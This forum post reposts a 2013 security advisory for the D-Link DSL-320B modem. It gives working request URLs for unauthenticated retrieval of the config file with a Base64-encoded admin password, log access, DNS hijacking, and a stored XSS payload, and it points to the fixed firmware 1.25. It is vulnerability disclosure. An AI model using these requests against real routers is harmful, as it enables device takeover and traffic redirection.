net3design Posted May 14, 2013 Report Posted May 14, 2013 Device: DSL-320BFirmware Version: EU_DSL-320B v1.23 date: 28.12.2010Vendor URL: D-Link Deutschland | DSL-320B ADSL2+ Ethernet Modem (Annex A)============ Vulnerability Overview: ============Access to the Config file without authentication => full authentication bypass possible!: (1)Request:192.168.178.111/config.binResponse===<snip>====<sysUserName value="admin"/><zipb enable="1"/><dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/><sysPassword value="dGVzdA=="/>===<snip>=====> sysPassword is Base64 encoded=> you could use this password also for accessing the device via telnet.Access to the logfile without authentication: (1)Request:192.168.178.111/status/status_log.sysChange the DNS Settings without authentication: (1)Request:http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2Stored XSS within parental control (2):=> Parameter: set/bwlist/entry:1/hostnameRequest:http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1Again you are able to place this XSS without authentication. Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3)Request:http://192.168.178.111/login.xgi?user=admin&pass=admin1Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3)Request:http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1============ Solution ============Update to firmware version 1.25Sursa : http://www.s3cur1ty.de/m1adv2013-018 Quote
